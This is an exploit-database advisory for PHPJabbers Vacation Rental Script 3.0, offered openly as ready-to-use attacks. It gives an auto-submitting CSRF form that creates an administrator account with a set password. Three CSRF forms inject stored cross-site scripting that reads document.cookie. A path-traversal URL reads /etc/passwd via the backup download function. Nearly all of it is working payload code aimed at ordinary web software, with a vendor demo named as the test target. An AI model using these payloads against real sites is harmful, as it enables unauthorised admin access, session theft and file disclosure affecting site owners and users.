PHPJabbers Vacation Rental Script V3.0 - Multiple Vulnerabilties

2014-01-15T00:00:00
ID 1337DAY-ID-21762
Type zdt
Reporter HackXBack
Modified 2014-01-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Vacation Rental Script V3.0 - Multiple Vulnerabilties
====================================================================
 
####################################################################
.:. Author         : HackXBack 
.:. Contact        : [email protected]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : http://www.phpjabbers.com/vacation-rental-script/
.:. Tested On Demo : http://www.phpjabbers.com/demo/vrl_30/1389729977/index.php?controller=pjAdmin&action=pjActionLogin
####################################################################

===[ Exploit ]===

[1] Cross Site Request Forgery 
==============================

[Add Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="phone" value="123456789"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html>

[2] Multiple Cross Site Scripting
==================================

# CSRF with XSS Exploit:

I. Xss In Types 

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=pjAdminTypes&action=pjActionCreate">
<input type="hidden" name="type_create" value="1"/>
<input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
</form>
</body>
</html>

II. Xss In Features

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=pjAdminFeatures&action=pjActionCreate">
<input type="hidden" name="feature_create" value="1"/>
<input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
</form>
</body>
</html>

III. Xss In Countries

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://site/index.php?controller=pjAdminCountries&action=pjActionCreate">
<input type="hidden" name="country_create" value="1"/>
<input type="hidden" name="i18n[1][name]" value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
</form>
</body>
</html>


[3] Local File disclure
========================
 
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd

####################################################################

#  0day.today [2018-03-20]  #